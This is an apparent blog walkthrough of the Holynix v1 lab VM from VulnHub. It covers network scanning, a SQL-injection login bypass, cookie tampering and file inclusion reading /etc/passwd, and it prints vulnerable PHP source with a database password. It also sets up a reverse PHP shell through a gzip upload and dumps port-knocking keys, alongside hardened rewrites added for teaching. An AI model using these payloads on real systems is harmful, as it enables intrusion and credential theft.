Sunday, 10 November 2013

Holynix -1 (Scanning + Enumeration)

Preparation:
Download: http://vulnhub.com/entry/holynix_v1,20/
MAC address: findstr "ethernet0.g" holynix.vmx
ethernet0.generatedAddress = "00:0c:29:bc:05:de"
ethernet0.generatedAddressOffset = "0"
VirtualBox: new machine, host-only network, change the MAC address to 000c29bc05de

Scanning:
1. Checking live systems
netdiscover -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                      
                                                                                                                                                    
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                    
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:9c:e8    01    060   CADMUS COMPUTER SYSTEMS                                                                           
 192.168.56.100  08:00:27:a5:50:60    01    060   CADMUS COMPUTER SYSTEMS                                                                           
 192.168.56.102  00:0c:29:bc:05:de    01    060   VMware, Inc.      

 2. Check open ports
unicornscan 192.168.56.102
TCP open                http[   80]        from 192.168.56.102  ttl 64
3. Fingerprint the OS & services
nmap -sV -sS -O 192.168.56.102 -pT:80
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 14:22 CET
Nmap scan report for 192.168.56.102
Host is up (0.00086s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.24 - 2.6.25 (99%), Linux 2.6.35 (95%), Linux 2.6.22 (SPARC) (95%), Linux 2.6.9 - 2.6.33 (94%), Linux 2.6.22 (embedded, ARM) (93%), Linux 2.6.16 (93%), Linksys WRV54G WAP (93%), Linux 2.6.18 - 2.6.24 (93%), ipTIME PRO 54G WAP (93%), Android 4.0.4 (Linux 2.6) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds
4. Scan for vulnerabilities
 nikto -host 192.168.56.102
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2013-11-09 14:25:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.12 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-2562: /login/sm_login_screen.php?error=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /login/sm_login_screen.php?uid=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 13372, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2013-11-09 14:26:06 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 dirb http://192.168.56.102/
-----------------
DIRB v2.03   
By The Dark Raver
-----------------

START_TIME: Sat Nov  9 14:27:06 2013
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: wordlists/common.txt

-----------------

GENERATED WORDS: 1942                                                         
                                                                              
---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/                                              
    (FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/footer                                                
    (FOUND: 200 [Ok] - Size: 63)
+ http://192.168.56.102/header                                                
    (FOUND: 200 [Ok] - Size: 604)
+ http://192.168.56.102/home                                                  
    (FOUND: 200 [Ok] - Size: 109)
+ http://192.168.56.102/img/                                                  
    ==> DIRECTORY
+ http://192.168.56.102/index                                                 
    (FOUND: 200 [Ok] - Size: 776)
+ http://192.168.56.102/login                                                 
    (FOUND: 200 [Ok] - Size: 342)
+ http://192.168.56.102/misc/                                                 
    ==> DIRECTORY
+ http://192.168.56.102/transfer                                              
    (FOUND: 200 [Ok] - Size: 44)
+ http://192.168.56.102/upload/                                               
    ==> DIRECTORY
+ http://192.168.56.102/~bin/                                                 
    ==> DIRECTORY
+ http://192.168.56.102/~mail/                                                
    ==> DIRECTORY
+ http://192.168.56.102/~sys/                                                 
    ==> DIRECTORY
                                                                              
---- Entering directory: http://192.168.56.102/img/ ----
+ http://192.168.56.102/img/index                                             
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/misc/ ----
+ http://192.168.56.102/misc/index                                            
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/upload/ ----
+ http://192.168.56.102/upload/index                                          
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/~bin/ ----
+ http://192.168.56.102/~bin/cat                                              
    (FOUND: 200 [Ok] - Size: 27312)
+ http://192.168.56.102/~bin/cp                                               
    (FOUND: 200 [Ok] - Size: 71664)
+ http://192.168.56.102/~bin/date                                             
    (FOUND: 200 [Ok] - Size: 55820)
+ http://192.168.56.102/~bin/dir                                              
    (FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/ip                                               
    (FOUND: 200 [Ok] - Size: 183288)
+ http://192.168.56.102/~bin/login                                            
    (FOUND: 200 [Ok] - Size: 35272)
+ http://192.168.56.102/~bin/ls                                               
    (FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/more                                             
    (FOUND: 200 [Ok] - Size: 27752)
+ http://192.168.56.102/~bin/mount                                            
    (FOUND: 200 [Ok] - Size: 81368)
+ http://192.168.56.102/~bin/mt                                               
    (FOUND: 200 [Ok] - Size: 28492)
+ http://192.168.56.102/~bin/netstat                                          
    (FOUND: 200 [Ok] - Size: 101228)
+ http://192.168.56.102/~bin/ping                                             
    (FOUND: 200 [Ok] - Size: 30856)
+ http://192.168.56.102/~bin/ps                                               
    (FOUND: 200 [Ok] - Size: 65360)
+ http://192.168.56.102/~bin/pwd                                              
    (FOUND: 200 [Ok] - Size: 27252)
+ http://192.168.56.102/~bin/tar                                              
    (FOUND: 200 [Ok] - Size: 234132)
                                                                              
---- Entering directory: http://192.168.56.102/~mail/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/ ----
+ http://192.168.56.102/~sys/console                                          
    (FOUND: 403 [Forbidden] - Size: 334)
+ http://192.168.56.102/~sys/core                                             
    (FOUND: 403 [Forbidden] - Size: 331)
+ http://192.168.56.102/~sys/disk/                                            
    ==> DIRECTORY
+ http://192.168.56.102/~sys/full                                             
    (FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/input/                                           
    ==> DIRECTORY
+ http://192.168.56.102/~sys/log                                              
    (FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/~sys/net/                                             
    ==> DIRECTORY
+ http://192.168.56.102/~sys/null                                             
    (FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/random                                           
    (FOUND: 200 [Ok] - Size: 0)
                                                                              
---- Entering directory: http://192.168.56.102/~sys/disk/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/input/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/net/ ----
                                                                              
-----------------
DOWNLOADED: 19420 - FOUND: 31
Enumeration
4. Enumerate services
Mantra http://192.168.56.102
5. Input fields
index.php?page=login.php
6. Break the login procedure
Enable HackBar, enable POST data, load the URL
user_name=admin&password=' or (1=1)#&Submit_button=Submit
7. Enumeration
View page source
 - ?page=employeedir.php
 - ?page=messageboard.php
 - ?page=calender.php
 - ?page=upload.php
 - ?page=ssp.php
 - ?do=logout
8. Identification
Cookie: uid=1
Cookies Manager: edit uid to 1,2,3,4,5,6,7,8,9,10,11
9. More enumeration
employeedir.php
 - img/blabla.jpg
 - email addresses, usernames?
messageboard.php
 - knockknock
 - Changetrack
calender.php
 - nothing
upload.php
 - uploads a file somewhere
 - transfer.php
ssp.php
 - Local File Inclusion error
 - text_file_name=ssp%2Femail.txt&B=Display+File
fimap -s -b --cookie="uid=2" --post="text_file_name=ssp%2Femail.txt&B=Display+File" -u "http://192.168.56.102/index.php?page=ssp.php"
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://192.168.56.102/index.php?page=ssp.php'
[15:32:43] [OUT] Inspecting URL 'http://192.168.56.102/index.php?page=ssp.php'...
[15:32:43] [INFO] Fiddling around with URL...
[15:32:43] [INFO] Sniper failed. Going blind...
[15:32:44] [OUT] Possible file inclusion found blindly! -> 'http://192.168.56.102/index.php?page=ssp.php' with POST-Parameter 'text_file_name'.
[15:32:44] [OUT] Identifying Vulnerability 'http://192.168.56.102/index.php?page=ssp.php' with Parameter 'text_file_name' blindly...
[15:32:44] [WARN] Unknown language - Autodetecting...
[15:32:44] [INFO] Autodetect thinks this could be a PHP-Script...
[15:32:44] [INFO] If you think this is wrong start fimap with --no-auto-detect
[15:32:44] [INFO] Testing file '/etc/passwd'...
[15:32:44] [INFO] Testing file '/proc/self/environ'...
[15:32:44] [INFO] Testing file 'php://input'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access.log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access_log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access_log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access_log'...
[15:32:44] [INFO] Testing file 'http://www.phpbb.de/index.php'...
##################################################################
#[1] Possible PHP-File Inclusion                                 #
##################################################################
#::REQUEST                                                       #
#  [URL]        http://192.168.56.102/index.php?page=ssp.php     #
#  [POST]       text_file_name=ssp%2Femail.txt&B=Display+File    #
#  [HEAD SENT]  Cookie                                           #
#::VULN INFO                                                     #
#  [POSTPARM]   text_file_name                                   #
#  [PATH]       Not received (Blindmode)                         #
#  [OS]         Unix                                             #
#  [TYPE]       Blindly Identified                               #
#  [TRUNCATION] Not tested.                                      #
#  [READABLE FILES]                                              #
#                   [0] /etc/passwd                              #
##################################################################
 - text_file_name=/etc/passwd&B=Display+File
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash
Error message: text_file_name=ssp%2a&B=Display+File
Warning:  fopen(ssp*) [function.fopen]: failed to open stream: No such file or directory in /var/apache2/htdocs/ssp.php on line 29

Warning:  stream_get_contents() expects parameter 1 to be resource, boolean given in /var/apache2/htdocs/ssp.php on line 30

Warning:  fclose(): supplied argument is not a valid stream resource in /var/apache2/htdocs/ssp.php on line 31
ssp.php : text_file_name=ssp.php&B=Display+File

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2></center>";
} else {
    echo "<center><h4><b>Standard Security Practices</b></h4></center><p>";
    echo "</p><form method=\"POST\" action=\"" . $_SERVER['SCRIPT_NAME'] . "?" . $_SERVER['QUERY_STRING'] . "\">";

    echo "<p><select size=\"1\" name=\"text_file_name\">";
    echo "<option value=\"ssp/email.txt\">Email";
    echo "</option>";
    echo "<option value=\"ssp/acceptable_use.txt\">Acceptable Use";
    echo "</option>";
    echo "<option value=\"ssp/internet_use.txt\">Internet Use";
    echo "</option>";
    echo "<option value=\"ssp/software_installation.txt\">Software Installation";
    echo "</option>";
    echo "<option value=\"ssp/malware.txt\">Malware";
    echo "</option>";
    echo "<option value=\"ssp/auditing.txt\">Auditing";
    echo "</option>";
    echo "</select></p>";
    echo "<p><input value=\"Display File\" name=\"B\" type=\"submit\"></p>";
    echo "</form>";
    echo "<pre>";

    // The file name is taken straight from the request and handed to fopen()
    // without any check: this is the arbitrary file read fimap reported above.
    $textfilename=$_REQUEST["text_file_name"];

    if ($textfilename <> "") {
        $handle = fopen($textfilename, "r");
        echo stream_get_contents($handle);
        fclose($handle);
    }
    echo "</pre>";
}
?>
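A hardened version of this viewer, added here as an illustration and not part of the Holynix VM. It assumes PHP 5.3 or later (for __DIR__) and that $auth is set by header.php as on the VM; the request carries only a short key, which is mapped to a file through an allowlist, so no request value ever reaches fopen().

```php
<?php
// Added example, not the VM's ssp.php: the document viewer rebuilt so that no
// request value ever reaches fopen(). The browser submits a short key; the key
// is mapped to a file through an allowlist, and the resolved path is checked to
// lie under the ssp/ directory next to this script. Assumes PHP 5.3+ (__DIR__)
// and that $auth is set by header.php as on the VM.

$ssp_documents = array(
    'email'                 => 'email.txt',
    'acceptable_use'        => 'acceptable_use.txt',
    'internet_use'          => 'internet_use.txt',
    'software_installation' => 'software_installation.txt',
    'malware'               => 'malware.txt',
    'auditing'              => 'auditing.txt',
);

/**
 * Map an allowlisted key to an absolute path inside $base_dir; null otherwise.
 * Unknown keys ("../../etc/passwd", "php://input", "ssp.php") fail the first test;
 * the realpath() comparison is defence in depth against a bad allowlist entry or a symlink.
 */
function ssp_resolve_document($key, array $allowed, $base_dir)
{
    if (!is_string($key) || !isset($allowed[$key])) {
        return null;
    }
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $allowed[$key]);
    if ($base === false || $path === false) {
        return null;                                  // directory or file missing
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                  // resolved outside ssp/
    }
    return $path;
}

if ($auth == 0) {
    echo "<center><h2>Content Restricted</h2></center>";
} else {
    echo "<center><h4><b>Standard Security Practices</b></h4></center>";
    echo "<form method=\"POST\" action=\"index.php?page=ssp.php\">";
    echo "<p><select size=\"1\" name=\"doc\">";
    foreach ($ssp_documents as $key => $file) {
        $label = htmlspecialchars(ucwords(str_replace('_', ' ', $key)), ENT_QUOTES, 'UTF-8');
        echo "<option value=\"" . htmlspecialchars($key, ENT_QUOTES, 'UTF-8') . "\">$label</option>";
    }
    echo "</select></p>";
    echo "<p><input value=\"Display File\" name=\"B\" type=\"submit\"></p>";
    echo "</form><pre>";

    $path = isset($_POST['doc'])
        ? ssp_resolve_document($_POST['doc'], $ssp_documents, __DIR__ . '/ssp')
        : null;
    if ($path === null) {
        echo "Unknown document.";                     // nothing else is ever opened
    } else {
        // Output is HTML-escaped so a policy file cannot inject markup into the page.
        echo htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8');
    }
    echo "</pre>";
}
?>
```

With the original form, every probe in the nikto and fimap output above (traversal, php://input, log paths, remote URLs) is simply an unknown key here.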
index.php : text_file_name=index.php&B=Display+File
<?php
include ("header.php");
// Grab inputs
$page = $_GET['page'];
if ($page=="") { include ("home.php"); }
else {
        // $page is concatenated into the query unescaped (see the SQL injection section below)
        $query = "SELECT location FROM page WHERE location = '". $page ."'";
        $result = mysql_query($query);
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        if ( file_exists($row['location']) ) { include($row['location']); } else { include("404.html"); }

}
include ("footer.php");
?>

home.php

<?php
if ( $auth == 0 ) { echo "<center><h3>You must login to access restricted content</h3></center>"; }
if ( $auth == 1 ) { echo "<center><h3>Welcome to the Nakimura Industries Production Server</h3></center>"; }
?>

login.php :

<?php
if ($failedloginflag==1) {
    echo '<h2><font color="#ff0000">Bad user name or password!</font></h2>';
    echo "If you continue to have problems logging in contact<br>the system administrator at ltorvalds@example.net<br><br>";
}
echo "<form method=\"POST\" action=\"" . $_SERVER['SCRIPT_NAME'] . "?" . $_SERVER['QUERY_STRING'] . "\">";
?>
    <p>Enter your username and password:</p>
    <p>Name:<br><input name="user_name" size="20" type="text"></p>
    <p>Password:<br><input name="password" size="20" type="password"></p>
    <p><input value="Submit" name="Submit_button" type="submit"></p>
</form>
<?php
?>

header.php
header.php could not be retrieved directly, so I was able to print it out with the help of WebScarab.
The essential and important parts concerning authentication were in here:
<?php
include '../config.inc';
include '../opendb.inc';

// Grab inputs
$username = $_REQUEST["user_name"];
$password = $_REQUEST["password"];
$surname = $_REQUEST["surname"];
$dosomething = $_REQUEST["do"];

if ($username <> "" and $password <> "") {
    $query  = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
    $result = mysql_query($query) or die('<b>SQL Error:</b>' . mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);
    if (mysql_num_rows($result) > 0) {
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        setcookie("uid", $row['cid']);
        $failedloginflag=0;
        echo '<meta http-equiv="refresh" content="0;url=index.php">';
    } else {
        $failedloginflag=1;
    }
}

switch ($dosomething) {
    case "logout":
        setcookie('uid','',1);
        break;
}

?>
<html><head>
<?php
if ($dosomething  == "logout") {
    echo '<meta http-equiv="refresh" content="0;url=index.php">';
    $auth = 0;
}
?>
</head>
<body bgcolor="#00bbcc">
<table border="0" width="100%" cellspacing="0" cellpadding="0">
    <tr><td bgcolor="#00bbcc" align="center" colspan="2">
        <table width="100%">
        <td valign="top"><br></td>
        <td align="center" valign="top"><h1><b>Nakimura Industries Production Server</b></h1>
        <?php
        $query  = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";
        $result = mysql_query($query) or die('Error Connecting to Database');
        echo mysql_error($conn);
        echo mysql_error($conn);
        if (mysql_num_rows($result) > 0) {
            while($row = mysql_fetch_array($result, MYSQL_ASSOC))
            {
                $logged_in_user = $row['username'];
                $upload = $row['upload'];
                $auth = 1;
                echo "Welcome, " .$logged_in_user. ".";
            }
        } else {
            $logged_in_user = "anonymous";
            $auth = 0;
            echo '<font color="#ff0000">Not logged in</font>';
        }
        ?>
        </td>
        </table>
    </td></tr>
    <tr>
        <td bgcolor="#00bbcc" valign="top" width="12%">
        <hr>
        <a href="index.php">Home</a><br>
        <?php
        if ( $auth == 0 ) { echo "<a href='?page=login.php'>Login</a><br />"; }
        if ( $auth == 1 ) {
            echo "<a href='?page=employeedir.php'>Directory</a><br />";
            echo "<a href='?page=messageboard.php'>Message Board</a><br />";
            echo "<a href='?page=calender.php'>Calender</a><br />";
            echo "<a href='?page=upload.php'>Upload</a><br />";
            echo "<a href='?page=ssp.php'>Security</a><br />";
            echo "<a href='?do=logout'>Logout</a><br />";
        }
        ?>
        <hr>
        </td>
        <td  valign="top" width="80%">
        <blockquote>

../config.inc

<?php
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'mY5qLr007p@S5w0rD';
$dbname = 'creds';

?>
../opendb.inc

<?php
$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die('Error connecting to mysql');
mysql_select_db($dbname) or die('Error Opening DatabaseSQL Error:' . mysql_error($conn) . 'SQL Statement:' . $query);
?>

upload.php : text_file_name=upload.php&B=Display+File

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2></center>";
} else {
    echo "<h3>Home Directory Uploader</h3>";
    echo "<form enctype=\"multipart/form-data\" action=\"index.php?page=transfer.php\" method=\"POST\">";
    echo "Please choose a file: <input name=\"uploaded\" type=\"file\"><br>";
    echo "<input name=\"autoextract\" value=\"true\" type=\"checkbox\"> Enable the automatic extraction of gzip archives.<br>";
    echo "<input value=\"Upload\" type=\"submit\"></form>";
}
?>
transfer.php

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2></center>";
} else {
    if ( $upload == 1 )
    {
        $homedir = "/home/".$logged_in_user. "/";
        $uploaddir = "upload/";
        $target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
        $uploaded_type = $_FILES['uploaded']['type'];   // MIME type as sent by the client
        $command=0;
        $ok=1;

        if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {    $command = 1; }

        if ($ok==0)
        {
            echo "Sorry your file was not uploaded";
            echo "<a href=\"?index.php?page=upload.php\">Back to upload page</a>";
        } else {
            if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br>";
                echo "The ownership of the uploaded file(s) have been changed accordingly.";
                echo "<br><a href=\"?page=upload.php\">Back to upload page</a>";
                if ( $command == 1 )
                {
                    // the archive is extracted as root straight into the user's home directory
                    exec("sudo tar xzf " .$target. " -C " .$homedir);
                    exec("rm " .$target);
                } else {
                    // the client-supplied file name goes unquoted into a root shell command
                    exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
                }
                exec("/var/apache2/htdocs/update_own");
            } else {
                echo "Sorry, there was a problem uploading your file.<br>";
                echo "<br><a href=\"?page=upload.php\">Back to upload page</a>";
            }
        }
    } else { echo "<br><br><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>
update_own
#!/bin/bash
sudo chown root:root /home/
sudo chown -R alamo:developers /home/alamo/
sudo chown -R nobody:developers /home/development/
sudo chown -R etenenbaum:users /home/etenenbaum/
sudo chown -R gmckinnon:users /home/gmckinnon/
sudo chown -R hreiser:staff /home/hreiser/
sudo chown -R jdraper:users /home/jdraper/
sudo chown -R jjames:staff /home/jjames/
sudo chown -R jljohansen:developers /home/jljohansen/
sudo chown -R kpoulsen:users /home/kpoulsen/
sudo chown -R ltorvalds:admin /home/ltorvalds/
sudo chown -R mrbutler:staff /home/mrbutler/
sudo chown -R rtmorris:users /home/rtmorris/
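The upload flow of transfer.php and update_own above, rewritten defensively as an added example (not the VM's code). It assumes header.php still supplies $auth, $upload and $logged_in_user, and it stores files under a constructed /srv/uploads/<user>/ directory outside the web root rather than in the served home directories.

```php
<?php
// Added example, not the VM's transfer.php. Changes against the original:
//  - the client file name is reduced to a strict character allowlist before it
//    is used in a path or shell command (the VM spliced it unquoted into exec()),
//  - the "is it gzip" decision reads the file's magic bytes, not the client MIME type,
//  - archive members are listed and refused if they could escape the target directory,
//  - nothing runs via sudo; extraction runs as the web server user with every
//    argument passed through escapeshellarg() and confined with -C,
//  - files land in UPLOAD_ROOT/<user>/, a constructed location outside the web root,
//    so an uploaded .php is never served (the VM extracted into /home, served via ~user).
// $auth, $upload and $logged_in_user are assumed to come from header.php as on the VM.

define('UPLOAD_ROOT', '/srv/uploads');

/** Safe basename or null: must start alphanumeric (no ".htaccess", no ".."), no shell metacharacters. */
function safe_upload_name($client_name)
{
    $name = basename($client_name);
    return preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/', $name) === 1 ? $name : null;
}

/** gzip data starts with the bytes 1f 8b; the Content-Type field of the upload is chosen by the client. */
function is_gzip_file($path)
{
    $fh = @fopen($path, 'rb');
    if ($fh === false) {
        return false;
    }
    $magic = fread($fh, 2);
    fclose($fh);
    return $magic === "\x1f\x8b";
}

/** True only if every member path is relative and free of ".." components. */
function archive_is_confined($archive)
{
    exec('tar tzf ' . escapeshellarg($archive) . ' 2>/dev/null', $members, $rc);
    if ($rc !== 0) {
        return false;
    }
    foreach ($members as $m) {
        if ($m === '' || $m[0] === '/' || in_array('..', explode('/', $m), true)) {
            return false;
        }
    }
    return true;
}

/** Store one $_FILES entry for $user, optionally extracting a gzip tarball; returns a status message. */
function store_upload($user, array $file, $extract)
{
    if ($file['error'] !== UPLOAD_ERR_OK || safe_upload_name($user) === null) {
        return 'upload failed';                     // the username becomes a path component too
    }
    $name = safe_upload_name($file['name']);
    if ($name === null) {
        return 'rejected: file name contains disallowed characters';
    }
    $dir = UPLOAD_ROOT . '/' . $user;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return 'upload failed';
    }
    $target = $dir . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return 'upload failed';
    }
    if (!$extract) {
        return "stored $name";
    }
    if (!is_gzip_file($target) || !archive_is_confined($target)) {
        unlink($target);
        return "rejected: $name is not a gzip tarball confined to your directory";
    }
    exec('tar xzf ' . escapeshellarg($target) . ' -C ' . escapeshellarg($dir) . ' 2>&1', $out, $rc);
    unlink($target);
    return $rc === 0 ? "extracted $name" : 'extraction failed';
}

if ($auth == 0) {
    echo "<center><h2>Content Restricted</h2></center>";
} elseif ($upload != 1) {
    echo "<h3>Home directory uploading disabled for user " . htmlspecialchars($logged_in_user) . "</h3>";
} elseif (isset($_FILES['uploaded'])) {
    $wants_extract = isset($_POST['autoextract']) && $_POST['autoextract'] === 'true';
    echo htmlspecialchars(store_upload($logged_in_user, $_FILES['uploaded'], $wants_extract));
}
?>
```

Because the web server user owns the upload directory, the root-run chown loop in update_own is no longer needed at all.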

Exploit (reverse php shell)
nc -l -v -p 1234
listening on [any] 1234 ...
Set Cookie: uid=2
pico revshell.php
$ip = '192.168.56.101';  // CHANGE THIS
tar cvzf revshell.tar.gz revshell.php
upload revshell.tar.gz
http://192.168.56.102/~etenenbaum/revshell.php
192.168.56.102: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 58391
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
 14:58:25 up  5:07,  0 users,  load average: 0.13, 0.03, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
$ ls /etc/knockknock.d/profiles
alamo
etenenbaum
gmckinnon
hreiser
jdraper
jjames
jljohansen
kpoulsen
ltorvalds
mrbutler
rtmorris
$ ls /etc/knockknock.d/profiles/etenenbaum -al
total 24
drwxr-xr-x  2 root root 4096 Dec  1  2009 .
drwxr-xr-x 13 root root 4096 Nov  8  2010 ..
-rw-r--r--  1 root root   25 Dec  1  2009 cipher.key
-rw-r--r--  1 root root   27 Dec  1  2009 config
-rw-r--r--  1 root root    3 Nov 18 19:02 counter
-rw-r--r--  1 root root   25 Dec  1  2009 mac.key

$ cat /etc/knockknock.d/profiles/etenenbaum/*
WC8pOHq67KHzuYEvH9qPRA==  <- cipher.key
[main]  <- config
knock_port = 13821
32 <- counter
OcOlArxJEvH7iecDOZGAmw== <- mac.key

Exploit (sql injection)

index.php:
    $query = "SELECT location FROM page WHERE location = '". $page ."'";
header.php:
